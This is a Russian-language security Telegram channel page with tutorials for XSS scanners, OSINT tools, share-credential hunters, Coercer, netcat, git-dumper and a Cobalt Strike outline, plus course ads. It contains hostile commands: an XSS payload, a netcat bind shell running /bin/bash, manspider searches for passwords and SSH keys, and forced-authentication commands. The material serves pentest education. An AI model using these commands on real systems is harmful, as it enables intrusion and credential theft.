codeby_sec | Unsorted

Telegram-канал codeby_sec - Codeby

34787

Крупнейшее ИБ сообщество ру-сегмента Чат: @codeby_one Форум: codeby.net Обучение: codeby.school Пентест: codeby.one CTF: codeby.games VK: vk.com/codeby YT: clck.ru/XG99c Сотрудничество: @KinWiz Номер заявления для регистрации канала в РКН: 5035340278

Subscribe to a channel

Codeby

BruteXSS

BruteXSS – это очень мощный и быстрый брутфорсер межсайтового скриптинга, который используется для брут-форсинга параметров. BruteXSS вставляет множественную полезную нагрузку, загружаемую из указанного списка слов (словаря) в указанные параметры и сканирует, является ли какой-либо из этих параметров уязвимым к XSS. BruteXSS очень точен при выполнении своей задачи, и нет никаких шансов ложных срабатываний. BruteXSS поддерживает POST и GET запросы, которые делают его совместимым с современными веб-приложениями.

📥Функции:
⏺️XSS bruteforce
⏺️XSS scanning
⏺️Поддержка GET/POST методов
⏺️Можно использовать словарь

Утилита не имеет каких-либо ключей так что сказать о ней можно мало чего, давайте просто посмотрим как она работает:

📌Установка:

git clone https://github.com/shawarkhanethicalhacker/BruteXSS-1.git


⬆️Запуск:
python2 brutexss.py


Далее программа просит нас выбрать метод HTTP, POST или GET:
[?] Select method: [G]ET or [P]OST (G/P): G


Теперь вводим URL:
[?] > http://example.com/?q=


и началось тестирование на доступность введённого нами URL.
Теперь чудо программа требует от нас словарь, в репозитории по умолчанию уже есть какой-то, его и укажем
[?] > wordlist.txt


и получаем такое сообщение:
[!] XSS Vulnerability Found! 
[!] Parameter: q
[!] Payload: </script>"><script>prompt(1)</script>


Очень удобная и простая утилита.

Читать полностью…

Codeby

FOCA — мощный инструмент OSINT для анализа метаданных 👀

FOCA (Fingerprinting Organizations with Collected Archives) — это инструмент для автоматического сбора документов с веб-сайтов и анализа их скрытой информации. В метаданных файлов могут содержаться имена пользователей, e-mail, версии ПО, принтеры, ОС и даже пароли!

Как работает FOCA?
1️⃣ Сканирование доменов — выбираем поисковые движки (Google, Bing, DuckDuckGo) и загружаем найденные документы.
2️⃣ Извлечение данных — FOCA анализирует файлы (PDF, DOCX, XLSX и др.), извлекая важную информацию.
3️⃣ Использование результатов — полученные метаданные помогают в OSINT-исследованиях, аудите безопасности и выявлении уязвимостей.

Настройка FOCA и обход ограничений
FOCA использует API Google, и при частых запросах возможны блокировки IP. Чтобы этого избежать, можно настроить Google API Key и Custom Search CX, что позволит работать без ограничений.

Что в полной статье?
🔸 Пошаговая установка FOCA
🔸 Как подключить Google API для обхода блокировок
🔸 Извлечение скрытой информации из документов
🔸 Советы по OSINT и автоматизации поиска

🔴Читать полностью

Читать полностью…

Codeby

Продолжаем разбираться с Flipper Zero! В первой части мы обсудили выбор устройства, покупку и популярные прошивки. Теперь настало время разобраться с тем, что сразу бросается в глаза — встроенными модулями Infrared (ИК-порт) и iButton.

🔸 Infrared (ИК-порт) — превращаем Flipper Zero в универсальный пульт. Как считывать сигналы от телевизоров, кондиционеров и другой техники? Какие протоколы поддерживаются? Разбираемся, как можно не только копировать команды, но и анализировать их структуру.

🔸 iButton (электронные ключи) — что внутри популярных "таблеток" Dallas Touch Memory? Как Flipper умеет считывать, эмулировать и даже подбирать коды для домофонов? Рассмотрим работу с ключами и возможности взлома с помощью iButton Fuzzer.

⚠️ Важно: эксперименты с Flipper Zero должны проводиться только в рамках закона!


🔴 Читать статью полностью

Читать полностью…

Codeby

Dalfox

Dalfox - мощный инструмент с открытым исходным кодом, ориентированный на автоматизацию, что делает его идеальным для быстрого сканирования на наличие уязвимостей XSS и анализа параметров. Его расширенный движок тестирования и нишевые функции разработаны для оптимизации процесса обнаружения и проверки уязвимостей.

Название инструмента происходит от Dal(달) — это корейское слово, означающее «луна» и «Fox» означает «Finder Of XSS»


🌚Доступные команды:
⏺️completion - Генерация скрипта автодополнения для указанной оболочки
⏺️file - Использовать файловый режим (список целей или необработанные данные)
⏺️help - Помощь
⏺️payload - Режим полезной нагрузки
⏺️pipe - Использовать режим конвейера
⏺️server - Запустить сервер API
⏺️sxss - Использовать режим Stored XSS
⏺️url - Использовать режим одной цели
⏺️version - Версия

⬇️Установка:
git clone https://github.com/hahwul/dalfox.git


📁Сборка:
go build


⬆️Запуск:
./dalfox


⬆️Запуск (без сборки):
go run dalfox.go


📌Давайте рассмотрим команды:
1️⃣Для простого сканирования цели используем такую команду:
./dalfox url https://example.com/?q=

2️⃣Для генерации скрипта автодополнения для указанной оболочки пишем:
./dalfox completion bash

подобное мы с вами уже видели в Gobuster
3️⃣Для запуска сервера API:
./dalfox server


📌Теперь посмотрим на ключи:
-X - позволит нам отправлять параметры в теле запросы либо в заголовке
./dalfox -X POST url https://example.com/?q=

-o - Записать результат в файл
./dalfox url http://example.com/?q= -o /home/kali/Desktop/out.txt

-F - позволит переходить по редиректам
./dalfox url https://example.com/?q= -F

Читать полностью…

Codeby

Если вы увлекаетесь информационной безопасностью, то наверняка слышали про Flipper Zero — карманное устройство для взаимодействия с RFID-картами, пультами, сигнализациями и другими системами. Но знаете ли вы, что его функциональность можно значительно расширить с помощью кастомных прошивок?

В новой статье разберем:

🔸 Где купить Flipper Zero в 2025 году и как не переплатить.
🔸 Как отличить разные версии устройства и что идет в комплекте.
🔸 Что делать после распаковки: настройка, обновление и установка прошивки.
🔸 Сравнение популярных прошивок:
🔴 Официальная — стабильная, но с ограниченным функционалом.
🔴 Xtreme Firmware — расширенные возможности и новые утилиты.
🔴 RogueMaster — максимальный набор инструментов, но не для новичков.
🔴 Unleashed — лучший выбор для работы с радиочастотами.
🔴 DarkFlipper — усиленная безопасность и анонимность.

Какую прошивку выбрать? Какие возможности открывает кастомизация? И чем вообще Flipper Zero хорош? Разбираемся в статье!

📍 Читать обзор полностью

Читать полностью…

Codeby

😼Netcat: Тайный Агент для Сетевой Диагностики

Netcat (или nc) — это инструмент, который называют «швейцарским ножом» для сетевых администраторов и хакеров. В чем его секрет и почему он так ценен? Давайте разберемся.


🐈‍⬛ Часть 1. Путеводитель по темным углам сети
Netcat — это мощный инструмент для системных администраторов и специалистов по безопасности. Он помогает разобраться в происходящем в сети, выявить уязвимости, решать проблемы с подключениями или проводить тестирование на проникновение. Netcat работает с TCP и UDP, прослушивает порты, отправляет и получает данные, а также взаимодействует с удаленными хостами.


🐈‍⬛ Часть 2. Оружие сетевого админа
Netcat — это инструмент командной строки для установки соединений между хостами, отправки и получения данных. Он полезен для диагностики, тестирования соединений и даже для более сложных атак.

🔍 Пример 1: Проверка открытых портов
Чтобы проверить, открыт ли порт на удаленном сервере:
nc -zv example.com 80-443

Параметр -z проверяет только открытые порты, а -v выводит информацию о процессе. Вы получите список открытых портов на сервере.

🔍 Пример 2: Установление простого соединения
Для отправки текстового сообщения или проверки соединения:
nc example.com 80

После подключения можно вручную ввести HTTP-запрос:
GET / HTTP/1.1
Host: example.com

Это вернет HTML-код главной страницы сайта, если сервер правильно обрабатывает запросы.


🐈‍⬛ Часть 3. Ближе к преступлению (скрытые возможности Netcat)
Netcat также используется для перехвата трафика, создания туннелей и удаленного выполнения команд.

🔍 Пример 3: Создание удаленной сессии
Для организации удаленного доступа без дополнительных программ:
На удаленном сервере:
nc -lvp 4444 -e /bin/bash

Это слушает порт 4444 и запускает оболочку /bin/bash. На локальной машине подключаемся:
nc remote-server 4444

Теперь у вас есть доступ к командной строке удаленного сервера.


🐈‍⬛ Часть 4. Тайный агент на вашей стороне
Netcat полезен для диагностики сетевых проблем:
1️⃣ Сканирование открытых портов.
2️⃣ Отладка сервисов через кастомные запросы.
3️⃣ Тестирование соединений между хостами и диагностика маршрутизации.
4️⃣ Перехват трафика и создание туннелей.

Читать полностью…

Codeby

GoSearch

GoSearch — эффективный и надежный инструмент OSINT, разработанный для обнаружения цифровых следов, связанных с определенным именем пользователя.
🔸Он быстрый, простой и надежный, позволяя пользователям отслеживать присутствие человека в сети на нескольких платформах.
🔸GoSearch также интегрирует данные из базы данных HudsonRock Cybercrime Intelligence Database для предоставления информации, связанной с киберпреступностью.
🔸Он также подключается к базе данных BreachDirectory.org, предлагая доступ к полному списку утечек данных, текстовым и хешированным паролям, связанным с именем пользователя.
🔸Этот инструмент идеально подходит для тех, кому нужны точные, простые результаты при расследовании онлайн-идентификации.

Главная цель этого инструмента — обеспечить простой и эффективный способ проверки присутствия человека в интернете, выявления его цифрового следа и, в некоторых случаях, даже получения информации о компрометированных данных, связанных с его профилем.

📎Возможности:
⏺️Поиск по широкому кругу платформ
⏺️Интеграция с базами данных утечек
⏺️Высокая скорость работы
⏺️Удобство и гибкость
⏺️После работы программы вывод сохраняется в txt файле

📌Установка:

git clone https://github.com/ibnaleem/gosearch


Для сборки пакета пишем:
go build

sudo cp gosearch /usr/bin


Запуск без сборки:
go run gosearch.go 


Для поиска по никнейму используем ключ -u без сборки:
go run gosearch.go -u hacker


Если вы укажите api-ключ от BreachDirectory.org, вывод станет более подробным.

Читать полностью…

Codeby

🚩 Новые задания на платформе Codeby Games!

🔎 Категория OSINTИстория одного фото

🌍 Категория ВебФорум предсказателей

Приятного хакинга!

Читать полностью…

Codeby

manspider — инструмент предназначенный для сканирования всех общих папок в целевых системах. Поддерживает большое количество типов файлов (pdf, docx, xlsx, pptx, любые текстовые форматы и др.). В качестве цели могут быть указаны IP, hostname, подсети, файлы.

🐍 Установка:

pipx install git+https://github.com/blacklanternsecurity/MANSPIDER


Опционально можно установить несколько зависимостей, чтобы добавить дополнительные возможности синтаксического анализа файлов:
apt install tesseract-ocr
apt install antiword


По умолчанию используются следующие настройки:

⏺️Глубина - 10 (переопределяется через -m)
⏺️Максимальный размер файла - 10 МБ (переопределяется через -s)
⏺️Потоки - 5 (переопределяется через -t)
⏺️Исключены общие ресурсы: C$, IPC$, ADMIN$, PRINT$ (переопределяется через --exclude-sharenames)

🔥 Примеры использования:

Поиск в сети имен файлов, которые могут содержать учетные данные. Через -f передаются имена с использование regex, -d для указания домена. Если предоставленные учётные данные не сработают, инструмент будет пробовать подключение в гостевом режиме, а затем через нулевой сеанс. Найденные файлы автоматически загружаются в $HOME/.manspider/loot.
manspider 192.168.0.0/24 -f passw user admin account network login logon cred -d evilcorp -u user -p pass


Поиск документов, содержащих пароли. Через -e указывается расширение файла, а флаг указывает на поиск внутри файла с использованием regex.
manspider share.evilcorp.local -c passw -e xlsx csv docx pdf -d evilcorp -u user -p pass


Поиск SSH-ключей по имени файла.
manspider share.evilcorp.local -e ppk rsa pem ssh rsa -o -f id_rsa id_dsa id_ed25519 -d evilcorp -u user -p pass

Читать полностью…

Codeby

За 2024 год зарегистрировано уже около 29 000 новых CVE. Но далеко не все уязвимости реально используются в атаках, и установить патчи сразу на всё просто невозможно. Как понять, какие угрозы критичны, а какие могут подождать?

Для этого существуют методики приоритизации уязвимостей, которые помогают оценить их опасность и определить, на какие угрозы реагировать в первую очередь.

🔸 CVSS (Common Vulnerability Scoring System) – самая популярная система оценки (от 0 до 10), но в открытом доступе обычно публикуют только базовые метрики, а реальный риск нужно рассчитывать отдельно.

🔸 EPSS (Exploit Prediction Scoring System) – предсказывает вероятность эксплуатации уязвимости в течение ближайших 30 дней, но не учитывает специфические контекстные факторы.

🔸 SSVC (Stakeholder-Specific Vulnerability Categorization) – вместо оценки опасности говорит КАК организация должна реагировать на уязвимость: немедленно исправлять, мониторить или просто отслеживать.

🔸 VISS (Vulnerability Impact Scoring System) – система от Zoom с 100-балльной шкалой, учитывающая влияние уязвимости на платформу, данные и инфраструктуру.

🔸 SSPP (Stakeholder-Specific Patching Prioritization) – методика для управления патчами: анализирует, были ли атаки, есть ли эксплойты и насколько уязвимо ПО в конкретной среде.

💡 Вывод: не существует идеальной системы, но можно комбинировать подходы. Например, CVSS + EPSS позволяет учитывать как технические параметры, так и реальный риск эксплуатации уязвимости.

Какой метод используете вы? Делитесь в комментариях!

➡️Читать статью полностью

Читать полностью…

Codeby

Sublist3r: Охота на скрытые субдомены

Sublist3r — это инструмент с открытым исходным кодом, предназначенный для поиска субдоменов доменов, помогает обнаружить скрытые поддомены, которые могут быть уязвимыми или предоставлять информацию о структуре веб-приложений.


Необходимо установить Sublist3r. Он написан на Python, поэтому важно иметь установленный Python 3.x.

1️⃣ Установка зависимостей
Для начала нужно клонировать репозиторий Sublist3r с GitHub:
git clone https://github.com/aboul3la/Sublist3r.git
cd Sublist3r


2️⃣ Установка зависимостей
Sublist3r использует несколько Python-библиотек. Чтобы установить все зависимости, выполните:
pip3 install -r requirements.txt


3️⃣ Запуск поиска субдоменов
Теперь, когда все настроено, можно начать сканирование. Для этого нужно указать домен, который вас интересует. Пример:
python3 sublist3r.py -d example.com  

Команда выполнит поиск субдоменов для домена example.com.

4️⃣ Использование дополнительных опций
Sublist3r имеет множество параметров, например:
- -o — для вывода результатов в файл.
- -p — чтобы указать количество потоков для ускорения поиска.
- -t — для указания времени ожидания.

Пример с несколькими опциями
python3 sublist3r.py -d example.com -o output.txt -p 50


Запрос найдет субдомены для example.com, выведет их в файл output.txt и использует 50 потоков для более быстрой обработки.

Недостатки Sublist3r
1️⃣ Зависимость от сервисов — блокировки или ограничения могут снизить точность.
2️⃣ Ограниченная точность — не все субдомены индексируются.
3️⃣ Лимиты API — ограничение запросов замедляет работу.
4️⃣ Скорость — зависимость от сторонних сервисов может замедлить поиск.
5️⃣ Отсутствие аналитики — инструмент только находит субдомены, не анализируя их безопасность.

Читать полностью…

Codeby

🔎 Snaffler — инструмент, помогающий находить полезную информацию (учетные записи, ключи и т.д.) в среде Windows/Active Directory. Snaffler поставляется с набором стандартных правил, встроенных в .exe. Они находятся в /Snaffler/SnaffRules/DefaultRules. При желании можно написать свои правила в формате .toml и указать до них путь при запуске утилиты -p .\path\to\rules.

Скачать скомпилированный инструмент можно по ссылке.

🏃 Обычный запуск может осуществляться следующей командой. Через -o передается файл куда записываются результаты, -s выводит результаты в консоль.

snaffler.exe -s -o snaffler.log


💱 Snaffler использует систему классификаторов, каждый из которых проверяет общие папки, папки с файлами или содержимое файлов, передавая некоторые элементы следующему классификатору, а другие отбрасывая. Каждый классификатор использует набор правил, чтобы решить, что делать с элементами, которые он классифицирует.

Эти правила могут быть очень простыми, например: "если расширение файла — .kdbx, сообщить об этом" или "если путь содержит windows\sxs, прекратить поиск подкаталогов и файлов в этом пути". В правилах также могут использоваться регулярные выражения, которые позволяют выполнять относительно сложные операции сопоставления с образцом.

🪄 Особенность инструмента заключается в объединении нескольких правил в цепочки и создание разветвлённых цепочек. Именно это позволяет Snaffler выполнять довольно глубокую проверку файлов там, где это необходимо, и при этом работать достаточно быстро.

Читать полностью…

Codeby

🔮Kismet: Магия Wi-Fi анализа для хакеров и исследователей

Kismet — это мощный анализатор сети Wi-Fi с открытым исходным кодом, который позволяет исследовать и отслеживать радиочастотное пространство.

С помощью Kismet можно не только анализировать трафик, но и заниматься разведкой на более глубоком уровне, включая мониторинг нестандартных частот и анализ помех.

1️⃣ Установка
Для начала вам нужно установить Kismet. Процесс зависит от операционной системы. Например, на Linux:

sudo apt-get install kismet

После установки убедитесь, что ваше устройство поддерживает мониторинг беспроводных сетей. Например, для некоторых карт потребуется установка дополнительных драйверов.

2️⃣ Запуск программы
Откройте терминал и запустите Kismet:
sudo kismet

Программа откроется в текстовом интерфейсе, где вам предстоит настроить параметры.

3️⃣ Сканирование сетей
После запуска Kismet начнёт сканировать все доступные Wi-Fi сети вокруг вас. Он покажет вам список точек доступа, включая их SSID (имя сети), MAC-адреса, каналы и типы шифрования.
В Kismet также отображаются скрытые сети, которые не транслируют свои имена, но всё равно могут быть обнаружены.

4️⃣ Анализ пакетов
Kismet позволяет вам «ловить» пакеты, передаваемые через эти сети. Вы можете увидеть, какие данные проходят через вашу сеть, а также анализировать их для потенциальных уязвимостей.
Для анализа трафика достаточно запустить захват пакетов. После этого вы сможете увидеть различные данные, включая протоколы, используемые в передаче, количество переданных байтов и другие характеристики.

🧙Пример использования
Если вы подозреваете, что кто-то подключился к вашей сети, используйте Kismet:

1️⃣ Запустите Kismet и начните сканирование.
2️⃣ Выберите вашу сеть и просмотрите список подключённых устройств.
3️⃣ Проверьте MAC-адреса на наличие незнакомых устройств.

Читать полностью…

Codeby

Coercer — скрипт на Python для автоматического принуждения сервера Windows к аутентификации на произвольном компьютере с помощью множества методов. Установка осуществляется с помощью команды python3 -m pip install coercer.

3 режима работы:
⏺️scan - проверка методов с известными рабочими путями для всех методов;
⏺️coerce - запуск принудительной аутентификации через все известные методы с известными рабочими путями. В данном режим на своей машине также необходимо запустить responder;
⏺️fuzz - проверка каждого метода со списком путей эксплойта.

💻 Примеры использования:

Анализ удалённых процедур на компьютере, чтобы понять, можно ли использовать их для принудительной аутентификации. Целевой хост передается через -t.

coercer scan -u user -p pass -t 10.0.0.8 -v


Использование вызовов удалённых процедур на удалённом компьютере, чтобы принудительно выполнить аутентификацию. Для вызова принудительной аутентификации Kerberos вместо адреса хоста нужно указывать его имя. Флагом -l указывается листенер на котором запущен responder.
coercer coerce -u user -p pass -l 10.0.0.80 -t 10.0.0.8 --always-continue


Прослушивание вызовов удалённых процедур на компьютере с разными путями.
coercer fuzz -u user -p pass -t 10.0.0.8 -v

Читать полностью…

Codeby

AD: как работает, как ломают и как защитить? Разбираемся в карточках.

➡️Новый поток курса по Active Directory стартует 3 марта. Попробуйте взлом и защиту на практике в нашей лаборатории. Регистрация

Читать полностью…

Codeby

Хотите освоить основы пентеста Active Directory и понять, как RedTeam проводят разведку корпоративных сетей?

Рады сообщить о нашем бесплатном вебинаре с куратором курса «Пентест инфраструктуры Active Directory»! 😎

🔸 3 марта 19:00 МСК
🔸 Открытый эфир на YouTube, VK, Twitch, RuTube, Telegram

Ссылки на трансляции появятся в нашем Телеграм канале в день вебинара!

Что вас ждет?
🔸 Разберем, что такое Active Directory и почему его безопасность критически важна
🔸 Покажем, как проводить начальную разведку с помощью инструментов nmap, netexec, enum4linux-ng
🔸 Обсудим анализ данных, интерпретацию открытых портов и проверку прав доступа
🔸 Проведем практическую демонстрацию атак: Pass-the-Hash, поиск администраторов, перебор паролей через kerbrute

Вебинар будет полезен начинающим пентестерам, специалистам по ИБ и всем, кто хочет понять основы тестирования AD. Ждём вас! 🚩

🔴 Подробнее о курсе здесь

Читать полностью…

Codeby

XSStrike — это пакет для обнаружения межсайтового скриптинга, оснащенный четырьмя написанными вручную парсерами, интеллектуальным генератором полезной нагрузки, мощным движком фаззинга и невероятно быстрым сканером.
Вместо того, чтобы вводить полезные данные и проверять их работоспособность, как это делают все остальные инструменты, XSStrike анализирует ответ с помощью нескольких парсеров, а затем создает полезные данные, которые гарантированно будут работать благодаря контекстному анализу, интегрированному с движком фаззинга.

📎Основные характеристики:
⏺️Отраженное и DOM XSS сканирование
⏺️Многопоточное сканирование
⏺️Анализ контекста
⏺️Настраиваемое ядро
⏺️Обнаружение и обход WAF
⏺️Сканирование устаревших JS lib
⏺️Интеллектуальный генератор полезной нагрузки
⏺️Ручной парсер HTML и JavaScript
⏺️Мощный движок фаззинга
⏺️Поддержка слепого XSS
⏺️Тщательно исследованный рабочий процесс
⏺️Полная поддержка HTTP
⏺️Перебор полезных нагрузок из файла
⏺️Работает на Photon, Zetanize и Arjun
⏺️Кодирование полезной нагрузки

📁Установка:

git clone https://github.com/s0md3v/XSStrike.git

pip3 install -r requirements.txt --break-system-packages


✔️Запуск:
python3 xsstrike.py


Давайте рассмотрим ключи, благодаря которым мы сможем сканировать URL:
-u или --url - наша цель:
python3 xsstrike.py -u "http://example.com/search.php?q=ctf"

--data - позволит передавать параметры в теле запроса:
python3 xsstrike.py -u "http://example.com/search.php" --data "q=ctf"
--path - позволит внедрить полезные данные в URL-путь:
python3 xsstrike.py -u "http://example.com/search/" --path
--json - позволит передать данные в json формате:
python3 xsstrike.py -u "http://example.com/search.php" --data '{"q":"ctf"}' --json
--crawl - с помощью этого ключа начинается процесс краулинга:
python3 xsstrike.py -u "http://example.com/search.php" --crawl
--fuzzer - Фаззер предназначен для тестирования фильтров и брандмауэров веб-приложений:
python3 xsstrike.py -u "http://example.com/search.php?q=ctf" --fuzzer

Это только очень маллая часть возможностей этого инструмента, ссылка на репозиторий ниже, Исследуйте!🥰

Ссылка на репозиторий: https://github.com/s0md3v/XSStrike

Читать полностью…

Codeby

Какие знания ключевые для успешного ИБ-специалиста?
🔴 Знание компьютерных сетей позволяет выявлять 70% уязвимостей, настраивать защиту и анализировать трафик, что критично для предотвращения 90% атак.

Освойте сети за 4 месяца на курсе от Академии Кодебай 😎 — стартуем 3 марта. Регистрация

Курс создан для:
Junior IT-специалистов, системных администраторов, Web-разработчиков, сетевых инженеров, которые хотят досконально освоить архитектуру сетей

Содержание курса:
Изучение топологии сетей, видов сетевого оборудования
Маршрутизация данных и управление доступом к среде
Протокол IP, транспортный и прикладной уровни
Система имен DNS, безопасность в сетях и противодействие атакам

🚀 По всем вопросам пишите @Codeby_Academy

Читать полностью…

Codeby

🫡 Git-Dumper: Извлечение данных из уязвимых .git-репозиториев

Git-Dumper — это инструмент с открытым исходным кодом, предназначенный для извлечения данных из уязвимых .git-репозиториев, которые доступны через веб-серверы. Он полезен для тестирования безопасности и анализа конфигурации серверов.



1️⃣ Установка Git-Dumper

Для начала необходимо клонировать репозиторий Git-Dumper с GitHub:

git clone https://github.com/arthaud/git-dumper.git  
cd git-dumper


2️⃣ Установка зависимостей

Git-Dumper требует установленных Python-библиотек для корректной работы. Установите их командой:

pip3 install -r requirements.txt  


3️⃣ Извлечение данных из .git-репозитория

Теперь можно приступить к извлечению данных. Для этого укажите URL-адрес уязвимого сайта и папку, в которую будет сохранен репозиторий. Пример:

python3 git-dumper.py http://example.com/.git/ output-folder  


Эта команда загрузит .git-репозиторий с сайта http://example.com/.git/ и сохранит его в папке output-folder.

4️⃣ Использование дополнительных опций

Git-Dumper поддерживает несколько параметров, которые упрощают его использование:
➡️ -b — задает путь для поиска бэкапов.
➡️ -c — указывает файл cookie для авторизации.
➡️ -p — задает прокси-сервер для работы.
➡️ -r — автоматически восстанавливает проект из .git.

Пример использования с опциями:
python3 git-dumper.py http://example.com/.git/ output-folder -r -p http://127.0.0.1:8080  

В данном примере инструмент:
➡️ Загружает .git-репозиторий.
➡️ Автоматически восстанавливает проект.
➡️ Использует прокси-сервер для выполнения запросов.

Читать полностью…

Codeby

GAP

Это эволюция оригинального расширения getAllParams для Burp. Он не только находит больше потенциальных параметров для исследования, но и находит потенциальные ссылки для проверки этих параметров и создает целевой список слов для использования при фаззинге.

📌Установка:
1️⃣Скачиваем последнюю версию Jython с официального сайта: тут
2️⃣Скачиваем код GAP: здесь
3️⃣В директорию GAP-Burp-Extension переносим файл Jython-standalone-x.x.x.jar
4️⃣Открываем Burp и идём в Extensions ➡️ Extension Settings ➡️ Python Environment, задаём диреткорию файла Jython и место куда будут загружаться модули я выбрал директорию GAP-Burp-Extension
5️⃣Открываем терминал в директории GAP-Burp-Extension и вводим команду:

 java -jar jython-standalone-x.x.x.jar -m ensurepip

6️⃣Далее устанавиливаем модуль:
 java -jar jython-standalone-x.x.x.jar -m pip install -r requirements.txt

7️⃣Теперь идём в Extensions ➡️ Installed и нажимаем на Add. Там указываем тип файла и сам GAP.py

Готово!

Читать полностью…

Codeby

Как провести успешный пентест, взломать AD, скомпрометировать всё, что можно, и выйти из сети заказчика победителем?

Изучите техники и методики атак на инфраструктуру Active Directory на курсе от Академии Кодебай! 😎

Наша практическая лаборатория содержит более 30 виртуальных машин, которые вам предстоит сломать. Начинаем 3 марта, регистрация — здесь.

Содержание курса:
🔴 Архитектура AD и ее базис
🔴 Харденинг в AD, добыча критичной информации, развитие по инфраструктуре
🔴 Захват и укрепление позиций внутри инфраструктуры
🔴 Применение и анализ популярных эксплоитов

Авторы курса: HackerRalf (Михаил Порываев) и BlackRabbit (Павел Никитин), 5-кратные победители the Standoff

Узнайте полную программу курса @Codeby_Academy 🚀

Читать полностью…

Codeby

🧭 Новый уровень защиты против телефонных мошенников от Google

Google продолжает улучшать безопасность своей операционной системы Android, представляя новые механизмы защиты пользователей. Одной из последних разработок стала функция, которая предотвращает изменение критически важных настроек во время телефонных звонков. Это нововведение направлено на борьбу с растущими угрозами, связанными с телефонными мошенниками, которые используют тактики социальной инженерии для установки вредоносных приложений.

Что такое TOAD и почему это важно?

Новая функция направлена на противодействие так называемым атакам TOAD (telephone-oriented attack delivery). Этот метод включает:
➡️Отправку SMS-сообщений, побуждающих жертву срочно позвонить на указанный номер.
➡️Использование телефонного разговора для создания ложного чувства срочности и убеждения жертвы выполнить опасные действия, такие как установка вредоносного ПО.

Примером таких атак является распространение приложений-дропперов, как было выявлено исследователями NCC Group и Национальным центром кибербезопасности Финляндии (NCSC-FI). Злоумышленники с помощью телефонных звонков и SMS обманом заставляли пользователей устанавливать вредоносные программы, такие как Vultr.

🗡 Как работает новая защита

Функция блокирует действия, которые мошенники часто требуют от пользователей во время телефонных разговоров:
➡️Включение установки приложений из неизвестных источников.
➡️Предоставление приложению доступа к функциям доступности.

При попытке изменить эти настройки во время звонка пользователи получают сообщение:
“Мошенники часто просят выполнять такие действия во время телефонных разговоров, поэтому эти действия заблокированы для вашей защиты. Если вас просят сделать это незнакомые люди, это может быть мошенничество.”

Кроме того, функция предотвращает предоставление приложению доступа к функциям доступности, пока звонок не завершится.

Эта функция уже доступна в Android 16 Beta 2, выпущенной на этой неделе.

Читать полностью…

Codeby

Overpass Turbo — веб-инструмент, позволяющий делать сложные запросы к базе данных OpenStreetMap и визуализировать результаты на карте. С ним можно выполнять любые запросы по собственным заданным параметрам поиска и анализировать их на интерактивной карте. Для этого в инструменте используется язык запросов Overpass Query Language. Операторы в нем выполняются один за другим. Каждый опратор должен заканчиваться точкой с запятой, которая является разделителем между ними. В интерфейсе Overpass Turbo в правой части имеется карта, в левой - поле для ввода запросов на языке Overpass QL.

🗺 Перед использованием инструмента необходимо познакомится с OpenStreetMap ("открытая карта улиц") — некоммерческий веб-картографический проект, созданный обычными пользователями в виде подробной свободной и бесплатной географической карты мира. Особенностью данной карты является то, что любой зарегистрированный пользователь может вносить в неё изменения. Разработана в 2004 году. С 2005 по 2022 год количество зарегистрированных участников выросло до 9 млн.

Пользователь может скачать любую часть или всю карту OpenStreetMap для использования в оффлайне. Таким образом, он может использовать скачанные данные для навигации, абсолютно не передавая информацию о местоположении сторонним сервисам.

🖥Вся информация в OpenStreetMap представлена в виде набора точек, линий и отношений.
⏺️Nodes — базовые единицы данных с координатами (широта и долгота). Используются для обозначения отдельных объектов, таких как деревья, остановки, колодцы.
⏺️Ways — последовательности точек, образующие дороги, реки, границы, здания и другие линейные объекты.
⏺️Relations — объединяют точки, линии и другие отношения в более сложные структуры с некоторыми свойствами, например автобусный маршрут.

Каждый объект снабжен тегами – парами ключ-значение, которые описывают его характеристики. Данные OSM хранятся в виде XML или бинарного формата PBF, оптимизированного для быстрого чтения и обработки.

Вот так выглядит пример запроса в Overpass Turbo, который находит все аптеки в Москве:

[out:json];
area[name="Москва"]->.searchArea;
(
node["amenity"="pharmacy"](area.searchArea);
);
out center;

Читать полностью…

Codeby

Arjun

Инструмент находит допустимые параметры HTTP с помощью огромного словаря по умолчанию, содержащего 25 890 имен параметров. Чтобы просмотреть этот огромный список, потребуется менее 10 секунд, при этом будет сделано всего 50–60 запросов к цели.

📎Возможности:
⏺️Поддерживает запросы GET/POST/POST-JSON/POST-XML;
⏺️Автоматически обрабатывает ограничения скорости и тайм-ауты;
⏺️Экспорт результатов в: BurpSuite, текстовый или JSON-файл;
⏺️Импортировать цели из: BurpSuite, текстового файла или необработанного файла запроса;
⏺️Может пассивно извлекать параметры из JS или 3 внешних источников.

📌Установка:

sudo apt install arjun


📌Также установите пакет для Python ratelimit:
pip install ratelimit

Если возникла ошибка о том, что это может навредить вашей системе, используйте ключ --break-system-packages

🌚Давайте запустим простую проверку:
arjun -u http://127.0.0.1/


💡Чтобы сохранить вывод в файл, используем ключ -o или -oJ:
arjun -u http://127.0.0.1/ -o out.txt

💡Для сохранения файла в текстовом варианте, используем -oT:
arjun -u http://127.0.0.1/ -oT out.txt


📎Исходный код: https://github.com/s0md3v/Arjun

Читать полностью…

Codeby

На конференции K2 Cloud Conf расскажем, как достучаться
до инфраструктуры, развернутой в облаке.

Обсудим разные подходы: от внешних IP-адресов до сложных топологий гибридного облака, где помимо встроенных средств сетевой безопасности можно использовать NGFW для инспектирования всего или почти всего трафика.

4-го марта. Онлайн и офлайн. Бесплатно.

Подробнее тут

Читать полностью…

Codeby

Cobalt Strike: Шахматная доска для хакеров — играем по-крупному

Cobalt Strike — это фреймворк для постэксплуатации, который используется для имитации атак с целью проверки защиты систем. Его цель — помочь профессионалам эффективно воспроизводить реальные угрозы и тестировать защитные механизмы.


Методика работы Cobalt Strike

Cobalt Strike позволяет создавать и управлять «бэкдорами», через которые злоумышленник может получать доступ к системе.

➡️Основные шаги работы с фреймворком:
1️⃣ Получение начального доступа - через фишинг или эксплойт скомпрометированная система получает агент Beacon.
2️⃣ Командование через Beacon - Beacon устанавливает скрытный канал связи с командным сервером атакующего.
3️⃣ Расширение контроля - атакующий может использовать различные техники для перемещения по сети (например, Pass-the-Hash) и получения прав администратора.
4️⃣ Эксфильтрация данных - в конце можно скачать конфиденциальные данные или выполнить другие действия по распоряжению.

➡️Пример использования Cobalt Strike
Представим пентест в организации, где исследуется безопасность сети.
1️⃣ Атакующий отправляет фишинговые письма с вложением, которое, при открытии, заражает компьютер жертвы пейлоадом Beacon.
2️⃣ Beacon связывается с сервером атакующего, давая ему возможность удалённо управлять системой.
3️⃣ Злоумышленник использует Pass-the-Hash, чтобы получить доступ к другим компьютерам в сети и повысить свои привилегии.
4️⃣ В конце пентестеры могут продемонстрировать, как злоумышленник скачивает базу данных с паролями или другую конфиденциальную информацию.

Читать полностью…

Codeby

